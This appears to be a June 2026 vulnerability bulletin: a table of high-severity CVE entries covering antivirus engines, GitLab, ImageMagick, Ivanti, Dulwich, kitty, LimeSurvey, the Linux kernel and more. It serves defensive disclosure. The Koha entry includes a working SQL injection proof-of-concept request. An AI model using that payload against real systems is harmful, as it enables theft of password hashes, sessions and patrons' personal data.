| Gen Digital--Avast Antivirus | Heap out-of-bounds read vulnerability in Avast Antivirus when scanning a malformed zip file containing XML may allow Local Execution of Code or Denial-of-Service of the antivirus process. This issue affects Avast Antivirus, AVG Antivirus, Norton Antivirus, Avast One, and Avast Business Antivirus on Windows, macOS, and Linux for virus definition builds from 25020100 before 25021208. The affected scanning logic is delivered through a shared Gen Digital virus definition update stream. The same stream feeds the consumer antivirus products listed in this advisory and other Gen Digital products that embed the same engine. Mitigation flows through this update channel; installations at or above the listed build are not vulnerable regardless of which product consumes the stream. | 2026-06-12 | 7.8 | CVE-2025-7011 |
| Gen Digital--Avira Antivirus | Heap buffer out-of-bounds write vulnerability due to integer overflow in Avira Antivirus engine when scanning a malformed MS-DOS executable file may allow Local Execution of Code or Denial-of-Service of the antivirus engine process. This issue affects Avira Antivirus on Windows, macOS, and Linux for engine builds before 8.3.70.104. | 2026-06-12 | 7.8 | CVE-2025-14098 |
| Gen Digital--Avira Antivirus | Heap buffer out-of-bounds read vulnerability in Avira Antivirus engine when scanning a malformed PDF file may allow Local Execution of Code or Denial-of-Service of the antivirus engine process. This issue affects Avira Antivirus on Windows, macOS, and Linux for engine builds before 8.3.70.68. | 2026-06-12 | 7.8 | CVE-2025-7002 |
| Gen Digital--Avira Antivirus | Heap buffer out-of-bounds read vulnerability in Avira Antivirus engine when scanning a malformed PDF file may allow Local Execution of Code or Denial-of-Service of the antivirus engine process. This issue affects Avira Antivirus on Windows, macOS, and Linux for engine builds before 8.3.70.56. | 2026-06-12 | 7.8 | CVE-2025-7003 |
| Gen Digital--Avira Antivirus | Heap buffer out-of-bounds read vulnerability in Avira Antivirus engine when scanning a malformed Windows MSI file may allow Local Execution of Code or Denial-of-Service of the antivirus engine process. This issue affects Avira Antivirus on Windows, macOS, and Linux for engine builds before 8.3.70.56. | 2026-06-12 | 7.8 | CVE-2025-7017 |
| Gen Digital--Avira Antivirus | Heap buffer out-of-bounds read vulnerability in Avira Antivirus engine when scanning a malformed Windows PE file may allow Local Execution of Code or Denial-of-Service of the antivirus engine process. This issue affects Avira Antivirus on Windows, macOS, and Linux for engine builds before 8.3.70.98. | 2026-06-12 | 7.8 | CVE-2025-9032 |
| Gen Digital--Avira Antivirus | Heap buffer out-of-bounds read vulnerability in Avira Antivirus engine when scanning a malformed PDF file may allow Local Execution of Code or Denial-of-Service of the antivirus engine process. This issue affects Avira Antivirus on Windows, macOS, and Linux for engine builds before 8.3.70.76. | 2026-06-12 | 7.8 | CVE-2025-9033 |
| Gen Digital--Avira Antivirus | Heap buffer out-of-bounds write vulnerability in Avira Antivirus engine when scanning a malformed POSIX tar archive may allow Local Execution of Code or Denial-of-Service of the antivirus engine process. This issue affects Avira Antivirus on Windows, macOS, and Linux for engine builds before 8.3.27.12. | 2026-06-12 | 7.8 | CVE-2026-6676 |
| Gen Digital--Avira Password Manager | Information disclosure vulnerability in Avira Password Manager when used with Mozilla Firefox may allow a remote attacker operating a cross-origin iframe to obtain credentials autofilled for the parent web page via incorrect autofill field selection. This issue affects Avira Password Manager when used with Mozilla Firefox on Windows, macOS, and Linux. | 2026-06-12 | 7.4 | CVE-2026-12068 |
| GitLab--GitLab | GitLab has remediated an issue in GitLab EE affecting all versions from 17.1 before 18.10.8, 18.11 before 18.11.5, and 19.0 before 19.0.2 that under certain conditions could have allowed an authenticated user with developer-role permissions to execute arbitrary client-side code on behalf of a targeted user due to improper input sanitization in the Analytics Dashboard. | 2026-06-11 | 8.7 | CVE-2026-10087 |
| GitLab--GitLab | GitLab has remediated an issue in GitLab EE affecting all versions from 15.5 before 18.10.8, 18.11 before 18.11.5, and 19.0 before 19.0.2 that under certain conditions could have allowed an authenticated user with group Owner role to take over another group member's GitLab account due to improper authorization in the Group SAML identity management functionality. | 2026-06-11 | 8.7 | CVE-2026-6552 |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 12.10 before 18.10.8, 18.11 before 18.11.5, and 19.0 before 19.0.2 that under certain conditions could have allowed an unauthenticated user to cause denial of service due to improper input validation in the API request parsing middleware. | 2026-06-11 | 7.5 | CVE-2026-7250 |
| GitLab--GitLab | GitLab has remediated an issue in GitLab EE affecting all versions from 13.1.4 before 18.10.8, 18.11 before 18.11.5, and 19.0 before 19.0.2 that under certain conditions could have allowed an authenticated user to add unauthorized email addresses to a targeted user's account due to improper sanitization of user-supplied input in certain group setting fields. | 2026-06-11 | 7.3 | CVE-2026-8589 |
| GL.iNet--GL-MT3000 | A weakness has been identified in GL.iNet GL-MT3000 up to 4.4.5. Affected is the function replace_country in the library /usr/lib/oui-httpd/rpc/tor of the component Tor Proxy Service Configuration Handler. This manipulation causes command injection. The attack can be initiated remotely. The exploit has been made available to the public and could be used for attacks. Upgrading to version 4.7 is able to address this issue. It is recommended to upgrade the affected component. The vendor was contacted early, responded in a very professional manner and quickly released a fixed version of the affected product. | 2026-06-14 | 8.8 | CVE-2026-12186 |
| GL.iNet--GL-MT3000 | A security vulnerability has been detected in GL.iNet GL-MT3000 up to 4.4.5. Affected by this vulnerability is an unknown functionality of the file /usr/bin/one_click_upgrade of the component Online Firmware Upgrade Handler. Such manipulation leads to command injection. The attack can be launched remotely. The exploit has been disclosed publicly and may be used. Upgrading to version 4.7 addresses this issue. Upgrading the affected component is advised. The vendor was contacted early, responded in a very professional manner and quickly released a fixed version of the affected product. | 2026-06-14 | 8.8 | CVE-2026-12187 |
| Global IT Informatics Services Inc.--WEOLL | Unrestricted upload of file with dangerous type vulnerability in Global IT Informatics Services Inc. WEOLL allows Accessing Functionality Not Properly Constrained by ACLs. This issue affects WEOLL: from 2.0.9 before 3.2.45.33. | 2026-06-12 | 8.7 | CVE-2026-6211 |
| grokability--snipe-it | Snipe-IT is an IT asset/license management system. A vulnerability in versions prior to 8.6.0 allows a non-admin user holding only the granular `users.edit` permission to lock every admin out of the instance by editing the `activated` flag (which determines whether or not a user can login) and the `ldap_import` flag, which determines whether or not the user can request a password reset. Version 8.6.0 contains a patch. | 2026-06-08 | 7.1 | CVE-2026-48507 |
| Hippoo--Hippoo Mobile App for WooCommerce | Incorrect Privilege Assignment vulnerability in Hippoo Mobile App for WooCommerce allows Privilege Escalation. This issue affects Hippoo Mobile App for WooCommerce: from n/a through 1.9.4. | 2026-06-11 | 9.8 | CVE-2026-49060 |
| IBM--i | IBM i 7.6, 7.5, 7.4, and 7.3 could allow a user to gain elevated privileges due to an unqualified library call. A malicious actor could cause user-controlled code to run with administrator privilege. | 2026-06-11 | 8.8 | CVE-2026-7870 |
| IBM--Langflow OSS | IBM Langflow OSS 1.0.0 through 1.9.1 could allow an authenticated user to read or modify sensitive information by bypassing authentication using insecure direct object references. | 2026-06-11 | 7.5 | CVE-2026-7787 |
| IBM--Qiskit SDK | IBM Qiskit SDK 0.43.0 through 2.5.0 could allow an attacker to trigger a segmentation fault leading to a denial of service due to uncontrolled recursion in the parser. | 2026-06-12 | 7.5 | CVE-2026-4870 |
| IEI Integration Corp--iRM-TSi410X | The iRM-IEI Remote Management developed by IEI Integration Corp has a Hardcoded Credentials vulnerability, allowing unauthenticated remote attackers to exploit hard-coded credentials to gain administrative privileges on the database. | 2026-06-12 | 9.8 | CVE-2026-11849 |
| IEI Integration Corp--iVEC TANK-XM811 | The iVEC-IEI Virtualization Edge Computer developed by IEI Integration Corp has an Arbitrary File Deletion vulnerability, allowing authenticated remote attackers to exploit this vulnerability to delete arbitrary system files or directories, resulting in data destruction or service disruption. | 2026-06-12 | 8.1 | CVE-2026-11846 |
| IEI Integration Corp--iVEC TANK-XM811 | The iVEC-IEI Virtualization Edge Computer developed by IEI Integration Corp has a OS Command Injection vulnerability, allowing privileged remote attackers to inject arbitrary OS commands and execute them on the device. | 2026-06-12 | 7.2 | CVE-2026-11845 |
| image-size--image-size | image-size through 2.0.2 contains a denial of service vulnerability that allows remote attackers to permanently block the Node.js event loop by supplying a specially crafted image buffer with a zero-valued size field in a recognized box-type. Attackers can trigger an infinite loop in the JXL or HEIF image parsers by providing a crafted image containing a box with a size of zero, causing the offset to never advance and permanently hanging the application. | 2026-06-09 | 7.5 | CVE-2025-71319 |
| image-size--image-size | image-size through 2.0.2 contains a denial of service vulnerability that allows remote attackers to permanently block the Node.js event loop by supplying a specially crafted image buffer with a zero-valued size field in a recognized box-type. Attackers can trigger an infinite loop in the JXL or HEIF image parsers by providing a crafted image containing a box with a size of zero, causing the offset to never advance and permanently hanging the application. | 2026-06-10 | 7.5 | CVE-2025-71329 |
| image-size--image-size | image-size through 2.0.2 contains a denial of service vulnerability that allows remote attackers to permanently block the Node.js event loop by supplying a specially crafted ICNS image buffer. Attackers can craft an ICNS buffer containing valid magic bytes and a zero-valued entry length field to trigger an infinite loop in the ICNS parser, as the offset is never incremented when the entry length field is 0, causing the while loop condition to remain true indefinitely. | 2026-06-10 | 7.5 | CVE-2025-71330 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 6.9.13-48 and 7.1.2-23, when reading multiple images with different dimensions an out of bounds heap write can occur. This issue has been patched in versions 6.9.13-48 and 7.1.2-23. | 2026-06-10 | 7.5 | CVE-2026-46520 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 7.1.2.23 and 6.9.13-48, due to a missing check in the MIFF decoder, a crafted file could cause an infinite loop resulting in CPU exhaustion. Versions 7.1.2.23 and 6.9.13-48 fix the issue. | 2026-06-10 | 7.5 | CVE-2026-46522 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 6.9.13-48 and 7.1.2-24, a missing check in the DCM decoder could result in an image with invalid dimensions and that could cause crashes in other operation. This issue has been patched in versions 6.9.13-48 and 7.1.2-24. | 2026-06-10 | 7.5 | CVE-2026-49218 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 6.9.13-50 and 7.1.2-25, a missing check for maximum memory request in AcquireAlignedMemory could trigger an out-of-Memory condition. This issue has been patched in versions 6.9.13-50 and 7.1.2-25. | 2026-06-10 | 7.5 | CVE-2026-53460 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 6.9.13-50 and 7.1.2-25, an incorrect loop in the ICON decoder can result in an out of bounds heap write resulting in a crash. This issue has been patched in versions 6.9.13-50 and 7.1.2-25. | 2026-06-10 | 7.5 | CVE-2026-53461 |
| imvks786--student_management_system | A vulnerability was identified in imvks786 student_management_system up to 9599b560ad3c3b83e75d328b76bedcd489ef1f46. This affects an unknown function of the file /index.ph of the component Login. Such manipulation of the argument usr/pwd leads to sql injection. The attack can be executed remotely. The exploit is publicly available and might be used. This product implements a rolling release for ongoing delivery, which means version information for affected or updated releases is unavailable. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-08 | 7.3 | CVE-2026-11530 |
| imvks786--student_management_system | A security flaw has been discovered in imvks786 student_management_system up to 9599b560ad3c3b83e75d328b76bedcd489ef1f46. This impacts an unknown function of the file admin/admin_login.php of the component Administrator Login Endpoint. Performing a manipulation of the argument a_usr/a_pwd results in sql injection. The attack is possible to be carried out remotely. The exploit has been released to the public and may be used for attacks. This product adopts a rolling release strategy to maintain continuous delivery. Therefore, version details for affected or updated releases cannot be specified. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-08 | 7.3 | CVE-2026-11531 |
| Inisev--Copy & Delete Posts | Copy & Delete Posts through 1.5.4 lets any plugin-enabled non-admin role invoke every operation in the cdp_action_handling AJAX handler. Attackers with an enabled role can delete posts or overwrite plugin settings via the f parameter, bypassing per-function capability checks. | 2026-06-10 | 8.1 | CVE-2026-53738 |
| InternLM--lmdeploy | LMDeploy is a toolkit for compressing, deploying, and serving large language models. In versions 0.12.3 and prior, LMDeploy is vulnerable to arbitrary code execution through hardcoded "trust_remote_code=True" in multiple HuggingFace model-loading call sites. At time of publication, there are no publicly available patches. | 2026-06-09 | 7.8 | CVE-2026-46432 |
| InternLM--lmdeploy | LMDeploy is a toolkit for compressing, deploying, and serving large language models. In versions 0.12.3 and prior, hardcoded "trust_remote_code=True" enables HF supply-chain RCE without user opt-in. At time of publication, there are no publicly available patches. | 2026-06-09 | 7.8 | CVE-2026-46517 |
| iova.mihai--SliceWP | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in iova.Mihai SliceWP allows Stored XSS. This issue affects SliceWP: from n/a through 1.2.6. | 2026-06-11 | 7.1 | CVE-2026-42653 |
| Ivanti--Endpoint Manager Mobile | An OS command injection vulnerability in Ivanti EPMM before 12.9.0.1, 12.8.0.3 and 12.7.0.2 versions allows a remote authenticated attacker to execute arbitrary commands as root | 2026-06-09 | 7.2 | CVE-2026-10727 |
| ivanti--Sentry | An OS Command Injection vulnerability in Ivanti Sentry before the R10.5.2, R10.6.2 and R10.7.1 versions allows a remote unauthenticated user to achieve root-level remote code execution | 2026-06-09 | 10 | CVE-2026-10520 |
| ivanti--Sentry | An Authentication Bypass vulnerability (CWE-288) in Ivanti Sentry before the R10.5.2, R10.6.2 and R10.7.1 versions allows a remote unauthenticated attacker to create arbitrary administrative accounts and obtain full administrative access | 2026-06-09 | 9.9 | CVE-2026-10523 |
| jelmer--dulwich | Dulwich is a pure-Python implementation of the Git file formats and protocols. Versions starting with 0.10.0 and prior to 1.2.5 have an arbitrary file write leading to remote code execution when cloning or checking out a malicious Git repository on Windows. Dulwich's path-element validator accepted tree entries whose filenames contained bytes that Windows interprets as structural path syntax. Contributing configuration bugs made matters worse. The core.protectNTFS and core.protectHFS settings were looked up under a wrong option name and so user-set values were silently ignored, and core.protectNTFS only defaulted to true on Windows (Git upstream has defaulted it to true everywhere since CVE-2019-1353). Both have been corrected. Anyone who clones, fetches, or checks out an untrusted repository with Dulwich on Windows - either through the Dulwich CLI, porcelain.clone, or any downstream tool built on Dulwich - is impacted. POSIX clones are not directly exploitable (on POSIX \ is a literal filename byte), but a POSIX user can unknowingly propagate a malicious tree to Windows consumers via push or re-publication. This issue is fixed in Dulwich 1.2.5. Users should upgrade to 1.2.5 or later. There is no effective pre-patch workaround. On affected versions the core.protectNTFS configuration key was silently ignored, so setting it to true does not mitigate the issue. Users who cannot upgrade should avoid cloning, fetching, or checking out untrusted repositories with Dulwich on Windows. After upgrading the NTFS validator is on by default on every platform, so no additional configuration is required. | 2026-06-10 | 8.8 | CVE-2026-42305 |
| jelmer--dulwich | Dulwich is a pure-Python implementation of the Git file formats and protocols. Starting in version 0.23.2 and prior to version 1.2.5, `dulwich.porcelain.submodule_update`, and by extension `porcelain.clone(..., recurse_submodules=True)`, materializes attacker-controlled submodule paths from a crafted upstream repository without path validation. A malicious `.gitmodules` plus a matching tree gitlink whose `path` is `.git/hooks` (or any other directory inside the parent repository's `.git` directory) causes the attacker's submodule tree contents to be written directly into the victim's `.git/hooks/` directory, preserving executable mode bits. The dropped executables are then run by any subsequent `git` or `dulwich` command that invokes the matching hook, resulting in arbitrary code execution. This is the dulwich equivalent of the upstream Git fixes for CVE-2024-32002 / CVE-2024-32004, which were never propagated into dulwich's separately implemented submodule porcelain. Version 1.2.5 patches the issue. | 2026-06-10 | 7.5 | CVE-2026-52726 |
| jmespath--jmespath.php | jmespath.php allows users to use JMESPath, software for declaratively specifying how to extract elements from a JSON document, in PHP applications with PHP data structures. Versions prior to 2.9.1 can generate and execute attacker-controlled PHP code when `JmesPath\CompilerRuntime` is used with an attacker-controlled JMESPath expression. The compiler emits parsed JMESPath function names into generated PHP source without sufficient escaping. A crafted expression can cause the generated cache file to contain executable attacker-controlled PHP, which is then loaded by the compiler runtime. The issue is patched in `2.9.1` and later. As a workaround, disable `JP_PHP_COMPILE` and do not use `JmesPath\CompilerRuntime` with attacker-controlled expressions. Use the default `AstRuntime` for untrusted expressions. Applications that must continue accepting untrusted JMESPath expressions before upgrading should ensure those expressions are never evaluated by the compiler runtime. | 2026-06-12 | 9.8 | CVE-2026-54133 |
| john-dagelmore--GPTranslate Multilingual AI Translation for WordPress: Automatically Translate Websites | The GPTranslate - Multilingual AI Translation for WordPress: Automatically Translate Websites plugin for WordPress is vulnerable to Stored Cross-Site Scripting via REST API Translation Storage in all versions up to, and including, 2.31 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The deterministically derived API key (sha256 of the site URL) is printed in the HTML source of every page via the JavaScript variable gptApiKey, meaning any unauthenticated visitor can retrieve the key and submit malicious translation payloads to the /wp-json/gptranslate/v1/request endpoint without any additional precondition. | 2026-06-13 | 7.2 | CVE-2026-9109 |
| js-cookie--js-cookie | JavaScript Cookie is a JavaScript API for handling cookies, client-side. Prior to version 3.0.7, js-cookie's internal assign() helper copies properties with for...in + plain assignment. When the source object is produced by JSON.parse, the JSON object's "__proto__" member is an own enumerable property, so the for-in enumerates it and the target[key] = source[key] write triggers the Object.prototype.__proto__ setter on the fresh target ({}). The result is a per-instance prototype hijack: Object.prototype itself is untouched, but the merged attributes object now inherits attacker-controlled keys. Because the consuming set() function then enumerates the merged object with another for...in, every key the attacker placed on the polluted prototype lands in the resulting Set-Cookie string as an attribute pair. The attacker can set domain=, secure=, samesite=, expires=, and path= on cookies whose attributes the developer thought were locked down. This issue has been patched in version 3.0.7. | 2026-06-10 | 7.5 | CVE-2026-46625 |
| koel--koel | Koel is a free, open-source music streaming solution. Prior to version 9.3.5, Koel validates the podcast feed URL via the SafeUrl rule (DNS resolution + public IP check), but the individual episode <enclosure url="..."> values extracted from the RSS XML are stored directly into the database without any SSRF validation. When a user plays an episode, the server downloads the full HTTP response from the unvalidated enclosure URL via Http::sink()->get() and streams it back to the user, enabling full-read SSRF against internal services. This issue has been patched in version 9.3.5. | 2026-06-12 | 7.7 | CVE-2026-47260 |
| Koha Community--Koha | SQL Injection in reports/catalogue_out.pl in Koha Community Koha through 22.11.37, 23.x, 24.x before 24.11.16, 25.05.x before 25.05.11, 25.11.x before 25.11.05, 26.05.x before 26.05.01, and 26.11.x before 26.11.00 allows an authenticated staff user with the Reports module flag to read arbitrary data from the Koha application database via the Filter URL parameter when the Criteria parameter matches /branchcode/. The vulnerable sink in sub calculate concatenates the unmodified Filter request parameter directly into a LIKE clause of the auxiliary $strsth2 statement and executes it via DBI without bound parameters: my $f = @$filters[0]; $f =~ s/\*/%/g; $strsth2 .= " AND $column LIKE '$f' "; This enables error-based SQL injection (e.g., via EXTRACTVALUE) and full read access to sensitive tables including borrowers (password hashes, 2FA secrets, PII), borrower_password_recovery, api_keys, and sessions. Proof of concept (error-based, single request): GET /cgi-bin/koha/reports/catalogue_out.pl?do_it=1&output=screen&Limit=10&Criteria=branchcode&Filter=x'+AND+EXTRACTVALUE(1,CONCAT(0x7e,VERSION(),0x7c,USER(),0x7c,DATABASE(),0x7e))--+- Cookie: CGISESSID=<LIBRARIAN_SESSION> The response body contains the DBI exception leaking the MariaDB version, database user, client IP, and database name, after which arbitrary data can be paged out using LIMIT n,1 / SUBSTRING(...). The vulnerable sink was introduced in commit 6bb77ae3e4 (2008-07-09); CVE-2015-4633 patched the same class in sibling files but did not generalise the fix to reports/catalogue_out.pl. Fixed in Koha 22.11.38, 24.11.16, 25.05.11, 25.11.05, 26.05.01, and 26.11.00 by replacing the raw concatenation with a parameterised placeholder. | 2026-06-13 | 7.6 | CVE-2026-6428 |
| kovidgoyal--kitty | Kitty is a cross-platform GPU based terminal. In versions prior to 0.47.0, a program able to write bytes to a kitty terminal - a remote SSH peer, a downloaded file viewed with `cat`, a log line, an email body rendered in `less`, an issue body in a TUI, etc. - can cause kitty to execute attacker-supplied Python inside the running kitty process, with the user's full privileges. There is no approval prompt, no remote-control permission requirement, no shell-integration interaction, no clipboard touch, and no editor interaction. Version 0.47.0 fixes the issue. | 2026-06-12 | 7.8 | CVE-2026-42851 |
| kovidgoyal--kitty | Kitty is a cross-platform GPU based terminal. In versions 0.47.0 and 0.47.1, `kitten dnd` can allow a malicious remote drag-and-drop source to overwrite or truncate arbitrary files writable by the local kitty user. Remote `text/uri-list` drops are staged in a temporary directory, but on case-sensitive filesystems duplicate remote basenames are not de-duplicated. An attacker can first create a staged symlink and then send a same-name regular-file entry. The regular-file write uses `utils.CreateAt()` / `openat(O_RDWR|O_CREAT|O_TRUNC)` without `O_NOFOLLOW`, so it follows the attacker-created symlink and writes outside the staging directory before final overwrite confirmation runs. This appears related in class to the file-transfer symlink advisory, but it is a different bug: it affects `kitten dnd` remote drag-and-drop staging, uses different vulnerable code (`kittens/dnd/drop.go` and `tools/utils/file_at_fd.go`), and reproduces on commit `4aa4a5c0567a92553a8c20a88a4352da637fca5d`, after the file-transfer `O_NOFOLLOW` fix. Version 0.47.2 patches the issue. | 2026-06-12 | 7.6 | CVE-2026-54056 |
| Kushan2k--student-management-system | A security flaw has been discovered in Kushan2k student-management-system up to f16a4ceaddd6729c4b306ed4641cda3176c1ef2a. Affected is an unknown function of the file service/RegisterService.php of the component Registration Endpoint. Performing a manipulation of the argument stimg results in unrestricted upload. The attack may be initiated remotely. The exploit has been released to the public and may be used for attacks. This product uses a rolling release model to deliver continuous updates. As a result, specific version information for affected or updated releases is not available. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-08 | 7.3 | CVE-2026-11474 |
| ladela--Online Scheduling and Appointment Booking System Bookly | The Online Scheduling and Appointment Booking System - Bookly plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'bookly-customer-full-name' cookie in versions up to, and including, 27.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Exploitation requires 'Remember personal information in cookies' setting to be enabled (disabled by default). | 2026-06-13 | 7.2 | CVE-2026-5513 |
| Lenovo--Accessories and Display Manager for Enterprise | During an internal security assessment, a potential vulnerability was discovered in Lenovo Accessories and Display Manager for Enterprise for Windows that could allow a local authenticated user to execute arbitrary code with elevated privileges. | 2026-06-10 | 7.8 | CVE-2026-9045 |
| Lenovo--LanSchool Classic | A potential uncontrolled search path vulnerability was reported in the LanSchool Classic client application that could allow a local authenticated user to execute arbitrary code with elevated privileges. | 2026-06-10 | 7.8 | CVE-2026-8637 |
| Lenovo--Smart Connect | A potential authentication bypass was reported in Lenovo Smart Connect for Windows that could allow a local authenticated user to execute arbitrary code with elevated privileges. | 2026-06-10 | 7 | CVE-2026-6090 |
| LiamBindle--MQTT-C | LiamBindle MQTT-C through version 1.1.6 contains a heap-based out-of-bounds read and integer underflow in the mqtt_unpack_publish_response() function in src/mqtt.c that allows a remote unauthenticated attacker controlling an MQTT broker - or able to inject MQTT traffic into an unencrypted session - to crash a subscribed MQTT-C client and potentially disclose adjacent heap memory by sending a single crafted PUBLISH packet. The function validates only that the fixed-header remaining_length is at least 4, then reads the 16-bit topic_name_size field from the broker-controlled packet and advances the parse pointer by that value without verifying that topic_name_size plus the surrounding overhead fits within remaining_length; it subsequently computes application_message_size as remaining_length - topic_name_size - 2 (QoS 0) or - 4 (QoS greater than 0) in unsigned arithmetic, producing an integer underflow that is then passed to memmove(). A PUBLISH packet with topic_name_size = 0xFFFF and remaining_length = 7 advances the parse pointer 65535 bytes past the receive buffer (out-of-bounds read) and causes an application_message_size near 2^32, crashing the process when the resulting memmove() is executed. | 2026-06-14 | 8.2 | CVE-2026-54412 |
| libp2p--js-libp2p | libp2p is a JavaScript Implementation of libp2p networking stack. Prior to version 16.2.6, an unauthenticated remote peer can exhaust the disk storage of any @libp2p/kad-dht node running in server mode by sending an unbounded stream of PUT_VALUE messages whose keys bypass all content validation. No credentials, no prior relationship, and no protocol deviation beyond a crafted key are required. The victim node's datastore fills until the host disk is exhausted, making the node unavailable. This issue has been patched in version 16.2.6. | 2026-06-10 | 7.5 | CVE-2026-45783 |
| libp2p--js-libp2p | libp2p is a JavaScript Implementation of libp2p networking stack. Prior to version 15.0.23, three cooperating omissions in @libp2p/gossipsub allow an unauthenticated single peer to exhaust the Node.js heap of any gossipsub node with default options. This issue has been patched in version 15.0.23. | 2026-06-10 | 7.5 | CVE-2026-46679 |
| Limatek System Inc.--LimRAD NAC | Unrestricted upload of file with dangerous type vulnerability in Limatek System Inc. LimRAD NAC allows Remote Code Inclusion. This issue affects LimRAD NAC: before 5.5.7.3.9. | 2026-06-11 | 9.8 | CVE-2026-7852 |
| LimeSurvey--LimeSurvey | LimeSurvey constructs account password-reset links from the client-supplied HTTP Host header without validating it. The optional allowedHosts allowlist that would constrain this is undefined in the default (and documented) configuration, so LSHttpRequest::checkIsAllowedHost() results in no operation. A remote, unauthenticated attacker who submits a forgotten-password request for a known account (requiring only the target's username and email) with a spoofed Host header causes LimeSurvey to email that account a reset link whose hostname is attacker-controlled while embedding the genuine validation_key. When the recipient or an automated inbound mail-security link scanner dereferences the link, the valid reset token is disclosed to the attacker, who replays it against the legitimate host's newPassword endpoint to set a new password and take over the account. | 2026-06-09 | 8.8 | CVE-2026-50635 |
| LimeSurvey--LimeSurvey | The RemoteControl API methods invite_participants and remind_participants pass a caller-supplied token-ID array into TokenDynamic::findUninvited(), which concatenates the values directly into a tid IN ('...') SQL clause without parameterization or input validation. A remote, authenticated attacker holding the tokens/update permission on a survey can inject a crafted array element to perform SQL injection. Because LimeSurvey configures its PDO connection with emulated prepared statements (emulatePrepare = true) and does not disable MySQL multi-statements, the injection supports stacked queries: the attacker can append arbitrary additional statements (INSERT/UPDATE/DELETE/DROP/CREATE) after the original SELECT. This permits both arbitrary read of any data in the database, such as administrator bcrypt password hashes (lime_users), survey response PII, session records, and global settings, all recoverable via a SLEEP() time-based blind oracle, and arbitrary write/destruction of that data, including directly overwriting the administrator password hash for immediate account takeover or dropping/truncating tables. Reads and writes extend to any schema the application's database user can access. The RemoteControl interface (RPCInterface = json/xml) must be enabled, which is not the default. | 2026-06-09 | 8.8 | CVE-2026-50636 |
| lingdojo--kana-dojo | KanaDojo before 0.1.18 contains a sandbox escape vulnerability that allows an attacker to execute arbitrary code by exploiting the explicit passing of the global require function into a Node.js vm.runInNewContext() sandbox context in the issue-auto-respond.yml workflow. Attackers can submit a pull request modifying messages.cjs to import arbitrary Node.js modules, bypassing sandbox restrictions and achieving remote code execution with full GitHub Actions runner privileges including access to AUTOMATION_PR_TOKEN. | 2026-06-11 | 7.3 | CVE-2026-48546 |
| lingdojo--kana-dojo | KanaDojo contains a command injection vulnerability that allows an attacker with pull request access to execute arbitrary shell commands by inserting shell metacharacters into the version or changes fields of patchNotesData.json, which are interpolated unsanitized into a child_process.execSync() call in the release.yml workflow. Attackers can have a malicious pull request merged to trigger the GitHub Actions runner with contents write permissions and access to GITHUB_TOKEN. | 2026-06-11 | 7.3 | CVE-2026-48547 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: lib/scatterlist: fix length calculations in extract_kvec_to_sg Patch series "Fix bugs in extract_iter_to_sg()", v3. Fix bugs in the kvec and user variants of extract_iter_to_sg. This series is growing due to useful remarks made by sashiko.dev. The main bugs are: - The length for an sglist entry when extracting from a kvec can exceed the number of bytes in the page. This is obviously not intended. - When extracting a user buffer the sglist is temporarily used as a scratch buffer for extracted page pointers. If the sglist already contains some elements this scratch buffer could overlap with existing entries in the sglist. The series adds test cases to the kunit_iov_iter test that demonstrate all of these bugs. Additionally, there is a memory leak fix for the test itself. The bugs were orignally introduced into kernel v6.3 where the function lived in fs/netfs/iterator.c. It was later moved to lib/scatterlist.c in v6.5. Thus the actual fix is only marked for backports to v6.5+. This patch (of 5): When extracting from a kvec to a scatterlist, do not cross page boundaries. The required length was already calculated but not used as intended. Adjust the copied length if the loop runs out of sglist entries without extracting everything. While there, return immediately from extract_iter_to_sg if there are no sglist entries at all. A subsequent commit will add kunit test cases that demonstrate that the patch is necessary. | 2026-06-08 | 9.8 | CVE-2026-46289 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: KVM: arm64: vgic-its: Drop the translation cache reference only for the erased entry vgic_its_invalidate_cache() walks the per-ITS translation cache with xa_for_each() and drops the cache's reference on each entry with vgic_put_irq(). It puts the iterated pointer, though, rather than the value returned by xa_erase(). The function is called from contexts that do not exclude one another: the ITS command handlers hold its_lock, the GITS_CTLR write path holds cmd_lock, and the path that clears EnableLPIs in a redistributor's GICR_CTLR holds neither. Two or more of them can drain the same cache concurrently, and if each one observes the same entry, erases it and then puts it, the single reference the cache holds on that entry is dropped more than once. The entry can then be freed while an ITE still maps it. xa_erase() is atomic and returns the previous entry, so put only the entry that this context actually removed. The cache reference is then dropped exactly once per entry even when the invalidations run concurrently, and the behavior is unchanged when only one context runs. | 2026-06-09 | 9.3 | CVE-2026-46316 |
